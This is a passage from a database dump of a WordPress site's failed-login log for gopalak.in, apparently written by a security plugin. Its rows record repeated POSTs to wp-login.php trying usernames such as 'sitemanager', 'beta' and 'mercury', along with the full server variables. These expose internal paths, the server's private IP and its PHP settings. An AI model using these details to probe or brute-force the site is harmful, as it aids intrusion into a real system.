bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65086\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048327.4726081;s:12:\"REQUEST_TIME\";i:1746048327;}}','196.251.112.104',1,'2025-05-01 02:55:29','2025-05-01 03:14:50'),(94636,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65085\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048327.4718831;s:12:\"REQUEST_TIME\";i:1746048327;}}','196.251.112.104',1,'2025-05-01 02:55:29','2025-05-01 03:14:50'),(94637,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65083\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048327.4688661;s:12:\"REQUEST_TIME\";i:1746048327;}}','196.251.112.104',1,'2025-05-01 02:55:29','2025-05-01 03:14:50'),(94638,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41984\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048445.2624071;s:12:\"REQUEST_TIME\";i:1746048445;}}','198.187.29.206',0,'2025-05-01 02:57:27','1970-01-01 00:00:00'),(94639,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64298\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048448.631001;s:12:\"REQUEST_TIME\";i:1746048448;}}','196.251.112.104',1,'2025-05-01 02:57:30','2025-05-01 03:14:50'),(94640,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64304\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048448.652003;s:12:\"REQUEST_TIME\";i:1746048448;}}','196.251.112.104',1,'2025-05-01 02:57:30','2025-05-01 03:14:50'),(94641,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64299\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048448.639086;s:12:\"REQUEST_TIME\";i:1746048448;}}','196.251.112.104',1,'2025-05-01 02:57:30','2025-05-01 03:14:50'),(94642,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64301\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048448.648011;s:12:\"REQUEST_TIME\";i:1746048448;}}','196.251.112.104',1,'2025-05-01 02:57:30','2025-05-01 03:14:50'),(94643,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64300\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048448.6467481;s:12:\"REQUEST_TIME\";i:1746048448;}}','196.251.112.104',1,'2025-05-01 02:57:30','2025-05-01 03:14:50'),(94644,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65007\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048573.587127;s:12:\"REQUEST_TIME\";i:1746048573;}}','196.251.112.104',1,'2025-05-01 02:59:35','2025-05-01 03:14:50'),(94645,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65000\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048573.5779021;s:12:\"REQUEST_TIME\";i:1746048573;}}','196.251.112.104',1,'2025-05-01 02:59:35','2025-05-01 03:14:50'),(94646,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65006\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048573.5817139;s:12:\"REQUEST_TIME\";i:1746048573;}}','196.251.112.104',1,'2025-05-01 02:59:35','2025-05-01 03:14:50'),(94647,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 